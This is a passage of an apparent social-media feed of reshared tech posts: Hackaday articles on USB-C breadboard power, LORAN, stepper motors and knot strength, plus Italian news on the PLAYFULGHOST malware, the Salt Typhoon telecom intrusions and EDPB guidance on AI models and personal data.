#tech
spcnet.it/funzionalita-di-micr…
@informatica
Funzionalità di Microsoft Bing imita le pagine di Google
Microsoft ha implementato un sistema che permette agli utenti di visualizzare i risultati di ricerca in un formato simile a quello di Google. Questa funzione è stata progettata per rendere la trans…Spcnet.it
reshared this
No Frills PCB Brings USB-C Power to the Breadboard
At this point, many of us have gone all-in on USB-C. It’s gotten to the point that when you occasionally run across a gadget that doesn’t support being powered USB-C, the whole experience seems somewhat ridiculous. If 90% of your devices using the same power supply, that last 10% starts feeling very antiquated.
So why should your breadboard be any different? [Axiometa] has recently unveiled a simple PCB that will plug into a standard solderless breadboard to provide 3.3 and 5 VDC when connected to a USB-C power supply. The device is going to start a crowdfunding campaign soon if you want to buy a completed one — but with the design files and Bill of Materials already up on GitHub, nothing stops you from spinning up your own version today.
What we like about this design is how simple it is. Getting the 5 V is easy, it just takes the proper resistors on the connector’s CC line. From there, a TPS63001 and a handful of passives provide a regulated 3.3 V. As you can see in the video, all you need to do when you want to change the output voltage for either rail is slide a jumper over.
Sure, it wouldn’t be much harder to add support the other voltages offered by USB-C Power Delivery, but how often have you really needed 20 volts on a breadboard? Why add extra components and complication for a feature most people would never use?
As an aside, we were very interested to see the torture test of the SMD pin headers at the end of the video. There’s considerable debate in the world of badge Simple-Add Ons (SAOs) about whether or not surface mount headers are strong enough to hold up to real-world abuse, and apparently similar concerns were raised about their usage here. But judging by the twisting and wrenching the pins withstood in the video, those fears would appear unwarranted.
youtube.com/embed/faXiy0wyiH8?…
#tech
spcnet.it/ces-2025-acer-presen…
@informatica
CES 2025, Acer presenta nuova gamma di PC basati su Intelligenza Artificiale
Acer ha recentemente svelato al CES 2025 una nuova gamma di laptop e desktop dotati di intelligenza artificiale, ampliando così la sua linea di prodotti Copilot. Questo annuncio segna un passo sign…Spcnet.it
reshared this
#tech
spcnet.it/studio-rivela-che-ti…
@informatica
Studio rivela che TikTok potrebbe favorire contenuti pro-CCP
Mentre ci si prepara per l’udienza della Corte Suprema riguardo alla possibilità di vietare TikTok negli Stati Uniti, un nuovo studio ha riacceso il dibattito sull’uso della piattaforma…Spcnet.it
reshared this
Growing Semiconductor Layers Directly With TMDs
Transition-metal dichalcogenides (TMDs) are a class of material that’s been receiving significant attention as a possible successor of silicon. Recently, a team of researchers has demonstrated the use of TMDs as an alternative to through-silicon-vias (TSV), which is the current way that multiple layers of silicon semiconductor circuitry are stacked, as seen with, e.g., NAND Flash ICs and processors with stacked memory dice. The novelty here is that the new circuitry is grown directly on top of the existing circuitry, removing the need for approaches like TSV to turn 2D layers into 3D stacks.
As reported in the paper in Nature by [Ki Seok Kim] and colleagues (gift article), this technique of monolithic 3D (M3D) integration required overcoming a number of technological challenges, most of all enabling the new TMD single-crystals to grow at low enough temperatures that it doesn’t destroy the previously created circuitry. The progress is detailed in the paper’s schematic (pictured above): from TSV to M3D by transfer of layers and high- and low-temperature growth of single-crystal layers.
Ultimately, the demonstration device with vertically grown transistor arrays (nMOS and pMOS) on a silicon substrate was grown at 385℃, which, if commercially developed, could mean a significant boost in transistor density and possibly the development of 3D semiconductor circuits rather than stacked 2D ones. We are still worried about making them the old-fashioned way.
Before GPS There Was LORAN
We found it nostalgic to watch [ve3iku] fire up an old Loran-A receiver and, as you can see in the video below, he got it working. If you aren’t familiar with LORAN, it was a common radio navigation technique before GPS took over everything.
LORAN — an acronym for Long Range Navigation — was a US byproduct of World War II and was similar in many ways to Britain’s Gee system. However, LORAN operated at lower frequencies to improve its range. It was instrumental in helping convoys cross the Atlantic and also found use in the Pacific theater.
youtube.com/embed/CAYVwltGHSQ?…
How it Worked
The video shows a Loran-A receiver, which, in its day, would have been known as LORAN. The A was added after versions B and C appeared. Back in the 1940s, something like this with a CRT and precision electronics would have been very expensive.
Unlike GPS, keeping a highly synchronized clock over many stations was impractical at the time. So, LORAN stations operated in pairs on different frequencies and with a known distance between the two. The main station sends a blip. When the secondary station hears the blip, it sends its own blip. Sometimes there were multiple secondaries, too.
If you receive both blips, you can measure the time between them and use it to get an idea of where you are. Suppose the stations were 372 miles apart. That means the secondary will hear the blip roughly 2 milliseconds after the primary sends it (the speed of light is about 186 miles per millisecond). You can characterize how much the secondary delays, so let’s just say that’s another millisecond.
Reception
Now both transmitted blips have to make it to your receiver. Let’s take a sill example. Suppose you are on top of station B. You’ll hear station A at the same time station B hears it. Then, when you subtract out the delay for station B, you’ll hear its blip immediately. You could easily guess you were 372 miles from station A.
It is more likely, though, that you will be somewhere else, which complicates things. If you find there is a 372-mile difference in your distance from station A to station B, that could mean you were 186 miles away from each station. Or, you could be 202 miles from station A and 170 miles from station B.
If you plot all the possibilities, you’ll get a hyperbolic curve. You are somewhere on the curve. How do you know where? You take a reading on a different pair of transmitters, and the curves should touch on two points. You are on one of those points.
This is similar to stellar navigation, and you usually have enough of an idea where you are to get rid of one of the points as ridiculous. You do, however, have to take into account the motion of your vehicle between readings. If there are multiple secondary stations, that can help since you can get multiple readings without switching to an entirely new pair. The Coast Guard video below explains it graphically, if that helps.
youtube.com/embed/PDtHulWGMGg?…
Receiver Tech
The receiver was able to inject a rectangular pulse on both channels to use as a reference, which is what the video talks about being the “pedestal” (although the British typically called it a cursor).
LORAN could operate up to 700 nautical miles in the day, but nighttime propagation would allow measurements up to 1,400 nautical miles away. Of course, the further away you are, the less accurate the system is.
During the day, things were simple because you typically just got one pulse from each station. But at night, you could get multiple bounces, and it was much more difficult to interpret.
If you want to dive really deep into how you’d take a practical fix, [The Radar Room] has a very detailed video. It shows multiple pulses and uses a period-appropriate APN-4 receiver.
In Care Of…
The U.S. Army Air Force originated LORAN. The Navy was working on Loran-B, but later gave up on it and took over an Air Force project with similar goals. In 1957, the Coast Guard took over both systems and named them Loran-A and Loran-C and decided they weren’t acronyms anymore. Loran-A started going away in the mid-1970s, although some overseas systems were active well into the 1990s. Loran-C survived even longer than that.
Oddly, the development of LORAN took place in a radiation laboratory. GPS isn’t that different other than having super synchronized clocks, many transmitters, and some very fancy math.
Featured Image: Detail of USAF special Loran chart. (LS-103) from the David Rumsey Map Collection, David Rumsey Map Center, Stanford Libraries.
Il futuro dell’Europa e del mondo
@Informatica (Italy e non Italy 😁)
In queste ore si stanno sollevando cori da stadio sui social network a favore e contro il sedicente accordo con l’azienda Space X di Elon Musk, voluto della Presidente del […]
L'articolo Il futuro dell’Europa e del mondo proviene da Edoardo Limone.
L'articolo edoardolimone.com/2025/01/06/i…
djpanini reshared this.
Cassette Tape Plays MP3s
Cassette tapes were a major way of listening to (and recording) music througout the 1980s and 1990s and were in every hi-fi stereo, boom box, and passenger vehicle of the era. Their decline was largely as a result of improvements in CD technology and the rise of the MP3 player, and as a result we live in a world largely absent of this once-ubiquitous technology. There are still a few places where these devices crop up, and thanks to some modern technology their capabilities as a music playback device can be greatly enhanced.
The build starts, as one might expect, by disassembling the cassette and removing the magnetic tape from the plastic casing. With the interior of the cassette empty it’s capable of holding a small battery, USB-C battery charger, and a Bluetooth module. The head of an old tape deck can be wired to the audio output of the Bluetooth module and then put back in place in the housing in place of the old tape. With the cassette casing reassembled, there’s nothing left to do but pair it to a smartphone or other music-playing device and push play on the nearest tape deck.
As smartphones continue to lose their 3.5 mm headphone jacks, builds like this can keep lots of older stereos relevant and usable again, including for those of us still driving older vehicles that have functioning tape decks. Of course, if you’re driving a classic antique auto with a tape technology even older than the compact cassette, there are still a few Bluetooth-enabled options for you as well.
youtube.com/embed/yFBVTpooZD0?…
VPN Con Sorpresa! Oltre all’Anonimato, Offerta anche una Backdoor Gratuitamente
I ricercatori di sicurezza informatica hanno scoperto un nuovo malware chiamato PLAYFULGHOST che ha ampie capacità di raccolta di informazioni. Le sue funzionalità includono keylogging, acquisizione di schermate e audio, accesso remoto alla riga di comando e trasferimento ed esecuzione di file.
Come sottolinea il team di Google Cloud Security, questo malware presenta somiglianze con Gh0st RAT, un noto strumento di amministrazione remota il cui codice sorgente è stato divulgato nel 2008. Le principali vie di infezione di PLAYFULGHOST sono le e-mail di phishing e lo spoofing SEO.
In uno dei casi di phishing gli aggressori hanno utilizzato un archivio RAR mascherato da immagine con estensione “.jpg”. Una volta estratto ed eseguito, l’archivio scarica un file eseguibile dannoso sul dispositivo, che alla fine scarica e attiva PLAYFULGHOST da un server remoto.
Un altro metodo di infezione tramite spoofing SEO prevede il download del programma di installazione LetsVPN, che contiene codice dannoso intermedio responsabile dell’installazione di componenti malware.
Per effettuare l’attacco, gli aggressori utilizzano tecniche come DLL Hijacking e DLL Sideloading per lanciare una libreria dannosa che carica e decrittografa PLAYFULGHOST nella memoria del dispositivo. In scenari complessi, più file vengono combinati per formare una DLL dannosa utilizzando una versione modificata dell’utilità Curl.
PLAYFULGHOST viene fissato nel sistema tramite chiavi di registro, pianificazione delle attività, cartella di avvio e servizi Windows. Il malware è in grado di raccogliere dati digitati, screenshot, audio, informazioni sull’account, contenuti degli appunti, metadati di sistema e prodotti antivirus installati. Può anche bloccare l’input da tastiera e mouse, cancellare i registri eventi di Windows, eliminare le cache del browser, i profili di messaggistica ed eseguire altre operazioni pericolose.
Inoltre, PLAYFULGHOST può distribuire strumenti aggiuntivi, inclusi Mimikatz e rootkit che nascondono file e processi. Uno di questi strumenti è Terminator, che sfrutta le vulnerabilità dei driver per distruggere i processi di sicurezza. Ad un certo punto dell’analisi, gli esperti hanno registrato che PLAYFULGHOST viene distribuito utilizzando il caricatore BOOSTWAVE, che utilizza il codice shell per iniettare file eseguibili dannosi.
App mirate come Sogou, QQ e 360 Safety, nonché esche sotto forma di LetsVPN, indicano una possibile attenzione agli utenti Windows di lingua cinese. In precedenza, nel luglio 2024, la società canadese eSentire aveva segnalato operazioni dannose simili in cui venivano utilizzati falsi programmi di installazione di Google Chrome per distribuire Gh0st RAT.
L'articolo VPN Con Sorpresa! Oltre all’Anonimato, Offerta anche una Backdoor Gratuitamente proviene da il blog della sicurezza informatica.
Gazzetta del Cadavere reshared this.
One Small Step: All About Stepper Motors
The primary feature of stepper motors is listed right within their name: their ability to ‘step’ forwards and backwards, something which they (ideally) can do perfectly in sync with the input provided to their distinct coils. It’s a feature that allows the connected controller to know the exact position of the stepper motor, without the need for any sensor to provide feedback after a movement, saving a lot of hardware and effort in the process.
Naturally, this is the optimal case, and there are a wide number of different stepper motor configurations in terms of coil count, types of rotors and internal wiring of the coils, as well as complications such as skipped steps due to mechanical or driver issues. Despite this, in general stepper motors are quite reliable, and extremely versatile. As a result they can be found just about anywhere where accurate, step-based movement is desirable, such as (3D) printers and robotics.
For each application the right type of stepper motor and driving circuit has to be determined, of course, as they also have many reasons why you’d not want to use them, or just a particular type. When diving into a new stepper motor-based project, exactly what are the considerations to pay attention to?
Stepper Motor Types
Exploded view of a 28BYJ-48 stepper motor. (Credit: Cookie Robotics)
Every stepper motor has a stator and rotor, effectively like any other electric motor. Their unique feature is the segmented nature of the stator, forming what are commonly referred to as ‘teeth’. These stator teeth are used for the coils, which align with either a permanent magnet ring, a soft iron core or both on the rotor. Much like with other electric motors the stator coils rotate the rotor, but due to this segmented design activating one coil can make the rotor progress one step in a very deterministic fashion. By successively activating these coils, the rotor will follow the magnetic field being generated and ‘stepping’ forward by a set amount on the output shaft.
As an example of a basic form you got a unipolar coil design with a permanent magnetic (PM) core, such as the very common 28BYJ-48. This stepper motor features 8 ‘teeth’ on the stator, driven by two coils wound as two levels (top and bottom) with a common center tap, giving a total of five control lines. This makes it a four-phase design, with four lines, two of which are energized in turn to move the rotor and one common line.
Although many schematic diagrams show pronounced teeth on the stator and/or rotor, this doesn’t have to be the case, as evidenced by e.g. this teardown of a 28BYJ-48 stepper motor by Cookie Robotics. The stator and its teeth are here formed by two coils, each encased in a metal plate with ‘claws’, as is typical for a tin-can stepper motor design. The metal claws are magnetized when the corresponding coil is energized, creating the north and south poles affecting the smooth permanent magnet rotor. This latter rotor’s magnet has a total of 8 alternating north-south pairs.
Single coil and claws section of a 28BYJ-48 stepper motor illustrated with current direction and resulting claw magnetization. (Credit: Cookie Robotics)
The choice for a PM rotor in this particular stepper motor is likely due to simplicity, while also providing decent torque when moving as well as when unpowered. Also known as cogging torque, detent torque is a property of PM rotor electric motors where the interaction between the stator and PM rotor resists movement of the latter. While useful in stepper motors with resisting a position change, it also means a lower speed and resolution compared to the alternatives, being:
- Variable reluctance core (VRC) in which the soft iron rotor has temporary magnetism due to the powered stator coils. This provides a faster speed and higher precision, but lower torque and no detent torque.
- Hybrid form, where the rotor has both PM and VRC elements, combining their advantages. The main disadvantage is the much more complex rotor construction and thus higher stepper motor cost.
What is also of note here is the gear train on the 28BYJ-48. While a stepper motor can have a gear train, it’s an optional trade-off between speed and torque. Confusingly, the 28BYJ-48 appears to come with a wide range of gear ratios, ranging from 1/64 to 1/16 and so on. This is likely due to how there is not a single manufacturer for this stepper motor, and thus a single model name covers both the 5V and 12V version, and a wide spectrum of gear ratios. Ergo, caveat emptor.
Uni- And Bipolar
Bipolar Stepper Motor Driving Circuit (Credit: Monolithic Power)
The difference between unipolar and bipolar design is covered in this stepper motor overview by Monolithic Power. A unipolar stepper motor like the 28BYJ-48 has four phases, each of which is controlled by turning the coil on or off, requiring quite basic circuitry. This means that the current in each coil will always only travel in a single direction, ergo unipolar.
This contrasts with bipolar stepper motors, which do not have the common line and only half the coils, but which can power each coil with the current travelling either direction, ergo bipolar. Naturally, this precludes using a simple unipolar driver like an ULN2003 Darlington array, as these cannot invert the current.
The trade-off between uni- and bipolar stepper motors is thus basically one between driver and stepper motor complexity. Yet as bipolar stepper motor drivers become more affordable and prevalent, the disadvantage of a unipolar stepper motor’s requirement to have twice as much copper in coils and thus weight and bulk is unlikely to ever improve significantly.
Driver Circuits
At this point we have established that driving stepper motors requires activation of their coils in a sequence and manner that produces the desired effect on the output shaft. Here we have effectively four techniques to pick from:
- Wave mode: activate just one phase in sequence.
- Full-step mode: activate two phases adjoining the rotor’s orientation. Increases torque due to activation of two phases at the same time.
- Half-step mode: combines wave and full-step to half the size of steps. Has irregular torque as sometimes two, and sometimes one phase is active.
- Microstepping: evolution of half-step whereby the current and thus the intensity of the magnetic field from one phase is varied.
Unsurprisingly, each change to a simple wave mode requires a more complex controller, and also increases the chance of skipping a step. When picking a ready-made stepper motor driver, these can be controlled in a wide range of ways, from instructing it to step forwards/backwards, to controlling stator’s phases, or even using pulse-width modulation to control the gate signals of the FETs in a bipolar stepper motor driver.
Picking the correct driver is of course completely project-dependent, and reliant on how much control you need over the stepper motor, as well as your budget for said driver. It might even be that what you actually want is a servo motor, as also pointed out in Douglas W. Jones’ excellent tutorial on controlling stepper motors.
General Disadvantages
As useful as stepper motors are, they have a number of clear disadvantages, not the least of which is their constant current draw. As there is no mechanical mechanism to hold the stator in place, their ability to hold position and generate torque is purely determined by the powered coils and whatever magnetism the rotor may have.
This means that they are not a great choice for low-power applications, or where high load torque is a requirement. In the case of the 28BYJ-48 which we looked at in this article, that current is 240 mA typical at 5VDC, per the datasheet.
All of this has to be weighed up against the ease of driving them, their (often) low cost and lack of need for a closed feedback system. While having a decelerating gear train as in the 28BYJ-48 helps to increase the torque, ultimately stepper motors are primarily about what’s in their name: stepping in a (usually) deterministic fashion.
Featured image: Still from [Lauri Rantala]’s first steps into stepper driving.
#CyberSecurity
securebulletin.com/brazilian-b…
Brazilian business attacked from Water Makara campaign - Secure Bulletin
A recent cyber threat report highlights the Water Makara campaign, a sophisticated spear-phishing attack specifically targeting Brazilian enterprises.securebulletin.com
reshared this
#CyberSecurity
securebulletin.com/chine-accus…
China accused of demaged undersea cable near Taiwan - Secure Bulletin
Taiwan has recently accused a Chinese-owned cargo ship of deliberately damaging an undersea communication cable off its northeastern coast, an incident that underscores the vulnerabilities of the island's critical infrastructure amid rising geopoliti…securebulletin.com
Gianlu 🇮🇹 🇪🇺 likes this.
reshared this
Giorgia Meloni in visita a Mar-a-Lago, serve anche per consegnare telecomunicazioni di difesa agli Stati Uniti e Musk
#PoliticalNotes
ilglobale.it/2025/01/giorgia-m…
@politica
Giorgia Meloni in visita a Mar-a-Lago, serve anche per consegnare telecomunicazioni di difesa agli Stati Uniti e Musk
ilGlobale - Quotidiano di informazione economica, politica e tecnologicailGlobale.it
reshared this
Potremo stupirci del fatto che non abbiamo bisogno di comprare tali servizi dall'estero, ma sviluppare e usare i nostri.
si, hai ragione, la mia era una domanda retorica.
Nel nostro caso è ancora più ridicolo che stia accadendo con un governo di destra che ha cantato il "Made in Italy" fino alla nausea per poi svendere importanti aspetti strategici per il Paese.
L'Italia ha un ruolo chiave nel progetto europeo GovSatCom che dovrebbe fornire comunicazioni sicure (con un centro in Italia, nel Fucino):
euspa.europa.eu/eu-space-progr…
Firmare un contratto con Starlink è un errore strategico piuttosto grave. Avere il controllo sulle tecnologie che utilizziamo è essenziale, per mantenere i posti di lavoro europei e garantire una indipendenza.
GOVSATCOM
The European Union Governmental Satellite Communications (GOVSATCOM) programme aims to provide secure, resilient and cost-efficient satellite communications capabilities to security and safety critical missions and governmental operations managed by …EU Agency for the Space Programme
Turns Out Humans Are Terrible At Intuiting Knot Strength
We are deeply intuitively familiar with our everyday physical world, so it was perhaps a bit of a surprise when researchers discovered a blind spot in our intuitive physical reasoning: it seems humans are oddly terrible at judging knot strength.
One example is the reef knot (top) vs. the grief knot (bottom). One is considerably stronger than the other.
What does this mean, exactly? According to researchers, people were consistently unable to tell when presented with different knots in simple applications and asked which knot was stronger or weaker. This failure isn’t because people couldn’t see the knots clearly, either. Each knot’s structure and topology was made abundantly clear (participants were able to match knots to their schematics accurately) so it’s not a failure to grasp the knot’s structure, it’s just judging a knot’s relative strength that seems to float around in some kind of blind spot.
Check out the research paper for all the details on how things were conducted; it really does seem that a clear understanding of a knot’s structure does not translate to being able to easily intuit which knot will fail first, even when the difference is a considerable one. There’s a video demonstration and an online version of the experiments if you’d like to try your hand at it.
It’s always interesting to discover more about our own blind spots, in part because exploiting them can result in nifty and delightful sensory illusions. We wonder if robots are any better with knots than humans?
Gli USA Sotto la Morsa degli Hacker Cinesi! TELCO e Reti Elettriche Sotto Mira: Urge Collaborazione
E’ Cyber War!
Molti aspetti degli attacchi di Salt Typhoon restano ancora da chiarire completamente, ma con il tempo emergono nuovi dettagli che delineano un quadro sempre più chiaro. Gli attacchi hacker attribuiti alla Cina, che finora ha respinto ogni accusa definendole disinformazione, sembrano configurarsi come un’operazione di portata ciclopica.
Nuove informazioni continuano ad emergere
Gli hacker cinesi sono penetrati all’interno delle reti delle società di telecomunicazioni americane, ma gli obiettivi iniziano ad allargarsi sempre di più mano a mano che le analisi giungono al termine. Tra le nuove vittime figurano Charter Communications, Consolidated Communications e Windstream, ha riferito il Wall Street Journal, citando persone a conoscenza della vicenda.
Gli aggressori hanno sfruttato le vulnerabilità dei dispositivi di sicurezza Fortinet e hanno compromesso i router Cisco Systems di grandi dimensioni. Oltre a penetrare nelle reti AT&T e Verizon, hanno attaccato l’infrastruttura di Lumen Technologies e T-Mobile.
AT&T e Verizon hanno confermato gli attacchi ai loro sistemi, ma hanno assicurato che le loro reti sono sicure. Lumen ha affermato che non ci sono più tracce di aggressori sulla sua rete. T-Mobile è riuscita a impedire l’accesso alle informazioni sensibili dei clienti.
Verizon ha affermato che l’attacco ha preso di mira singoli clienti, inclusi dipendenti governativi e politici, che sono già stati informati. Il responsabile legale della società, Vandana Venkatesh, ha sottolineato che l’incidente è stato contenuto.
Cisco e Fortinet hanno rifiutato di commentare. Gli obiettivi precedentemente noti di Salt Typhoon includono individui associati alle campagne di Kamala Harris e Donald Trump.
Gli avvertimenti dell’FBI di Febbraio 2024
Già a febbraio, il direttore dell’FBI, Christopher Wray, aveva avvertito che la Cina era pronta a lanciare operazioni di sabotaggio contro le reti degli Stati Uniti, sottolineando la portata e l’ambizione delle sue strategie cibernetiche.
Le infrastrutture critiche statunitensi, come energia, telecomunicazioni e trasporti, puntando a causare interruzioni su vasta scala. Questo tipo di minaccia, descritta come una delle più gravi mai affrontate dagli Stati Uniti, evidenziava come il regime di Pechino stesse sfruttando strumenti cibernetici avanzati per prepararsi a scenari di conflitto, sia economico che geopolitico.
Gli attacchi di Salt Typhoon sembrano confermare le preoccupazioni dell’FBI, mostrando un livello di sofisticazione tecnica e coordinamento senza precedenti. Queste operazioni non solo puntano a rubare informazioni sensibili, ma anche a testare la resilienza delle reti critiche americane. Gli esperti ritengono che questo tipo di attività rappresenti una fase preparatoria per attacchi più distruttivi, con il rischio di paralizzare intere porzioni del Paese in caso di escalation.
Nel 2023 gli attacchi alle reti elettriche
L’amministrazione Biden ha rivelato una preoccupante realtà fin dal 2023: gli hacker cinesi possiedono la capacità di paralizzare la rete elettrica e i porti statunitensi. Secondo quanto riportato, non si tratta di semplici intrusioni informatiche, ma di attacchi condotti da attori altamente sofisticati, dotati di competenze tecniche senza precedenti.
Jake Sullivan, consigliere per la sicurezza nazionale, era a conoscenza di queste capacità da oltre un anno, come confermato da fonti del Wall Street Journal. Già nell’autunno del 2023, Sullivan aveva avvertito i leader delle telecomunicazioni e della tecnologia durante una riunione segreta alla Casa Bianca, sottolineando l’urgenza di collaborare con le Big Tech per proteggere le infrastrutture e le vite americane da attacchi informatici devastanti.
Questo allarme segna un passo significativo nella strategia di difesa cibernetica statunitense, evidenziando quanto le minacce informatiche globali stiano rapidamente evolvendo.
Muro contro Muro o Cooperazione?
Gli Stati Uniti, un tempo leader indiscussi nella tecnologia e nell’innovazione, stanno perdendo terreno nella corsa globale contro un colosso come la Cina. L’inasprimento dei rapporti tra le due superpotenze non sembra portare a una soluzione sostenibile; anzi, rischia di trascinare il mondo verso una rovina collettiva. Come ha detto il celebre stratega cinese Sun Tzu, “se non puoi vincere una guerra, unisciti al tuo avversario.” Questo consiglio suona più attuale che mai: affrontare la Cina senza considerare la possibilità di una cooperazione strategica potrebbe trasformarsi in un errore dalle conseguenze irreparabili.
La Cina ha dimostrato di essere organizzata sul piano cyber. Le sue infrastrutture tecnologiche sono fortificate dal “Grande Firewall” che filtra tutte le comunicazioni in entrata e in uscita dal Paese. Al contrario, le reti americane, pur avanzate, risultano più esposte alle minacce, come dimostrato dai recenti attacchi attribuiti a gruppi di hacker cinesi. Questa disparità – dettata purtroppo dall’esigenza della censura in primis – porta ad un elevato controllo delle proprie reti.
Lo scontro diretto tra USA e Cina potrebbe scatenare un’escalation senza precedenti, portando danni significativi non solo alle due potenze, ma anche a coloro che si trovano nel mezzo: l’Europa. Sul piano economico e geopolitico, il Vecchio Continente rischia di pagare il prezzo più alto, vedendo compromesse le sue relazioni commerciali e la stabilità globale. Per evitare tale scenario, è fondamentale avviare un dialogo concreto con la Cina, cercando punti di incontro piuttosto che perpetuare uno scontro distruttivo.
Spetta ora alle leadership politiche fare la differenza. Se si vuole un futuro sostenibile, sarà necessaria una visione diplomatica lungimirante, una qualità che in passato è spesso mancata da entrambe le parti. Sarebbe interessante vedere se figure come Donald Trump, noto per la sua retorica polarizzante, sia in grado di adottare un approccio più conciliante e lavorare verso una cooperazione con Pechino e speriamo che gli interessi economici di Elon Musk possano indirizzare verso questo.
La storia dimostra che grandi alleanze sono state forgiate persino tra nemici giurati, e forse è tempo che gli Stati Uniti e la Cina considerino questa possibilità per il bene del mondo intero.
L'articolo Gli USA Sotto la Morsa degli Hacker Cinesi! TELCO e Reti Elettriche Sotto Mira: Urge Collaborazione proviene da il blog della sicurezza informatica.
Gli USA Sotto la Morsa degli Hacker Cinesi! TELCO e Reti Elettriche Sotto Mira: Urge Collaborazione
redhotcyber.com/post/gli-usa-s…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence #intelligenzaartificiale #informationsecurity #ethicalhacking #dataprotection #cybersecurityawareness #cybersecuritytraining #cybersecuritynews #infosecurity
Gli USA Sotto la Morsa degli Hacker Cinesi! TELCO e Reti Elettriche Sotto Mira: Urge Collaborazione
Gli attacchi informatici attribuiti alla Cina mettono in luce la crescente tensione globale tra Washington e Pechino. Gli USA, sempre più vulnerabili, devono scegliere tra scontro o collaborazione per evitare una crisi mondiale.Redazione RHC (Red Hot Cyber)
reshared this
Come l’Europa sta riscrivendo le regole per l’intelligenza artificiale: tutto quello che devi sapere
Gli strumenti di intelligenza artificiale sono ormai una realtà conclamata con cui tutti noi operiamo giornalmente. Sono strumenti che stanno rapidamente diventando insostituibili e necessari, soprattutto in ambito produttivo e lavorativo in genere.
In questi mesi si è parlato molto di I.A., di come adottarla, di come implementarla nei processi produttivi. Ci siamo fatti una cultura su concetti come Machine Learning, Training, Large Language Models, e relativi acronimi. Il 2024 ha visto anche l’approvazione dell’A.I. Act che, tuttavia prima del 2026 non vedrà una vera e propria efficacia.
Ciò detto, oggi molte realtà, produttive e non, si pongono domande su come implementare correttamente strumenti di intelligenza artificiale nei propri processi organizzativi e produttivi, in particolare in relazione al trattamento dei dati personali.
Infatti è noto che i dati sono la linfa vitale di qualunque sistema di Intelligenza Artificiale, attraverso i quali viene allenato. Gli stessi concetti di data set e big data sono ormai entrati nel linguaggio quotidiano di chi si occupa di materie digitali, che sa bene quanto l’affidabilità e la sicurezza di un sistema di AI dipenda dalla qualità e dalla quantità di dati con i quali viene svolto il training.
Ciò ha fatto sorgere una serie di domande e problematiche agli operatori, che sono state accolte e fatte proprie anche dalle Autorità di Controllo. In particolare l’Autorità Garante per la protezione dei dati personali irlandese ha sottoposto all’EDPB una serie di questioni che hanno trovato recentemente risposta in alcune linee guida emesse dall’organismo europeo. Queste costituiscono una buona traccia da seguire in un momento in cui la strada verso una completa compliance nell’adozione dell’Intelligenza Artificiale è caratterizzata da banchi di nebbia sparsi.
L’obiettivo dichiarato del parere fornito dall’EDPB è infatti quello di fornire una quadro di riferimento alle Autorità di controllo per la soluzione di alcune questioni che potrebbero sorgere.
Benché non si ponga l’obiettivo di dare risposte totalmente esaustive, questo quadro di riferimento per i controllori è uno strumento fondamentale anche per i controllati, che hanno, in tal modo, una traccia da seguire per essere conformi alla normativa.
Concetto di Intelligenza Artificiale
Il primo passaggio determinante è comprendere in quale ambito si applicano le linee guida fornite dall’EDPB.
In primo luogo l’EDPB fa riferimento la definizione di Intelligenza Artificiale data dall’A.I. Act, tuttavia questo richiamo ha il solo scopo di stabilire che il documento in analisi non riguarda i modelli di Intelligenza Artificiale in quanto tali.
Infatti le linee guida in commento si applicano solo a quel sottoinsieme di modelli di intelligenza artificiale che sono il frutto di un addestramento attraverso i dati.
Questa specificazione non è di secondo momento considerato che alcuni modelli di AI, oggetto di training, possono essere incorporati in altri strumenti definiti di Intelligenza Artificiale.
Ciò detto, queste linee guida si applicano solo al modello di A.I. che è oggetto di addestramento sui dati e non agli altri modelli che, integrati al primo, daranno origine al prodotto unitario finale.
In seconda battuta l’EDPB specifica che le linee guida si applicano anche a quei modelli di A.I. che, pur non essendo concepiti per fornire dati personali quali risultato di output, vengono comunque addestrati con questi.
Questa considerazione non dovrebbe sorprendere considerato che il GDPR considera dati personali qualsiasi informazione che renda, in qualunque modo, un soggetto identificato o identificabile.
Partendo da questo presupposto l’EDPB evidenzia che la recente ricerca ha dimostrato come sia ragionevolmente probabile, mediante l’impiego di certi strumenti, poter estrarre i dati di addestramento e quelli oggetto di analisi del modello.
D’altronde, come specificato nel documento, i modelli di AI tendenzialmente non contengono record che siano facilmente isolabili, bensì relazioni probabilistiche tra i dati utilizzati dal modello stesso secondo certi parametri. Ciò fa si che tali dati siano deducibili partendo dalle informazioni sul modello.
Tali strumenti, quindi, nel momento in cui utilizzano dati personali per l’addestramento e/o per l’elaborazione dei risultati, anche se non li forniscono come output, non possono comunque essere considerati anonimi. Si consideri, inoltre, che tali dati, anche se non vengono forniti come risultato, sono comunque acquisiti, elaborati e conservati dal modello. Tutte operazioni che, a mente del GDPR, costituiscono trattamenti (“qualsiasi operazione o insieme di operazioni, compiute con o senza l’ausilio di processi automatizzati e applicate a dati personali o insiemi di dati personali”, art. 4 n. 2) ).
Dati anonimi? Dimostramelo!
Dopo aver compiuto un esplicito riferimento al concetto e alle tecniche di anonimizzazione previste dal provvedimento del WP29 05/2014, l’EDPB chiarisce che va fornita la prova circa l’avvenuta anonimizzazione del dato.
I criteri di prova sono tre:
- non deve essere possibile dedurre o inferire il dato personale partendo dal dataset ritenuto anonimo. Considerato quanto già detto nel paragrafo circa la possibilità di deduzione del dato attraverso l’utilizzo di software, l’EDPB considera altamente raccomandabile una valutazione approfondita dei rischi derivanti dall’identificazione. La portata dei termini utilizzati dall’EDPB porta lo scrivente a ritenerli un “affettuoso” invito a una DPIA preventiva.
- nell’analisi di cui al punto precedente vanno tenuti in considerazione tutti i mezzi ragionevolmente utilizzabili, facendo particolare riferimento a:
- le caratteristiche dei dati di addestramento stessi, del modello di IA e della procedura di addestramento;
- il contesto in cui il modello di IA viene rilasciato e/o elaborato;
- le informazioni supplementari che consentirebbero l’identificazione e che potrebbero essere a disposizione di una determinata persona;
- i costi e il tempo di cui la persona avrebbe bisogno per ottenere tali informazioni supplementari (nel caso in cui non siano già a sua disposizione);
- la tecnologia disponibile al momento del trattamento, nonché gli sviluppi tecnologici.
- La valutazione del rischio riguarda non solo le possibilità del titolare di risalire ai dati, ma anche quelle di eventuali terze persone, a qualunque titolo, in modo volontario o accidentale.
L’EDPB conclude sostenendo che affinché un modello di IA possa essere considerato anonimo, sia la probabilità di estrazione diretta (anche probabilistica) di dati personali che la probabilità di ottenere, intenzionalmente o meno, tali dati personali da query, dovrebbe essere irrilevante per qualsiasi interessato.
La valutazione deve essere svolta considerando tutti i mezzi che ragionevolmente possono essere utilizzati.
Un ulteriore spunto da valutare riguarda il pericolo di divulgazione e replicazione del modello.
Quali elementi valutare per stabilire se i dati sono anonimi
